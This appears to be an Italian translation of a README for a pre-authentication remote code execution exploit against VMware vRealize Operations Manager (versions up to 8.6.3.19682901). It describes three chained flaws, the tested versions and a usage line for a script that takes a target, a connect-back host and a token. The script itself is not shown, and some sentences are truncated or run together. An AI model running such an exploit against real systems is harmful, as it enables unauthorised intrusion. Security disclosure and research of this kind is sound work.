
Questo è un exploit RCE pre-autenticato per VMware vRealize Operations Manager
Questo è un exploit RCE pre-autenticato per VMware vRealize Operations Manager (vROPS) che interessa le versioni <= 8.6.3.19682901.
Steven Seeley di Qihoo 360 Vulnerability Research Institute
L'exploit è stato testato contro la versione 8.6.3.19682901 usando il file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) ma è noto che funzioni anche su altre versioni precedenti.
Questo exploit combina tre vulnerabilità che sono state corrette. Ulteriori dettagli sono disponibili nel post del blog:
Questo exploit richiede che l'attaccante fornisca:
APUAT-8.5.0.18176777.pak.Ci sono molte componenti in gioco in questo exploit, spero di averlo progettato bene così funziona al primo colpo.
L'exploit impiega in media ~1m34.142s per completarsi (testato 5 volte), ho provato a progettarlo per renderlo più veloce, ma rientra nel tempo assegnato per una competizione ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
